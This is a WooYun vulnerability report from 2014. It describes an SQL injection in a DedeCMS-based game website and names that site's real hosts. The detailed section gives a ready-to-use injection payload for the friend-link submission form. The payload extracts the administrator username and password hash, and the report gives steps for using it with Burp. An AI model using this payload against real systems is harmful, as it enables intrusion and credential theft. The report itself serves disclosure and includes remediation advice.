当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057860

漏洞标题:1717pk网页游戏网运维不当存在SQL注入漏洞

相关厂商:1717pk网页游戏网

漏洞作者: 小红猪

提交时间:2014-05-07 11:49

修复时间:2014-06-21 11:49

公开时间:2014-06-21 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

就是年初那个dede CMS全版本通杀SQL注入漏洞,哈哈~~

详细说明:

漏洞说明看这里:
WooYun: DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)
http://0day5.com/archives/1542
存在漏洞的文件:uploadsafe.inc.php
目标:http://flash.1717pk.com/,http://www.1717pk.com/(一起PK小游戏)
同样,这里也用了添加友情链接的这个地方:/plus/flink.php
查看管理员用户及密码poc:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
其中validate换成正确的验证码即可。
根据漏洞说明来到添加友情链接处:http://flash.1717pk.com/plus/flink_add.php
开启burp,直接点击提交,抓包改包:

1.JPG


提交后,返回中弹出一个框说提交成功,需要审核,基本上说明就存在该漏洞:

2.JPG


然后返回到这里:
http://flash.1717pk.com/plus/flink.php
查看源代码就会看到了:

3.JPG


骗银,明明说的需要审核的啊~~~

漏洞证明:

都在详细说明里说了,再贴一张图:

3.JPG


主站和falsh.1717pk.com在同一服务器上,所以同样存在该问题:

4.JPG

修复方案:

1、升级dede CMS版本。
2、如果紧急,可暂禁用添加友情链接功能,但是根据漏洞作者描述该漏洞应该在任意可提交数据的功能中都能利用,所以还是升级版本更好些。

版权声明:转载请注明来源 小红猪@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝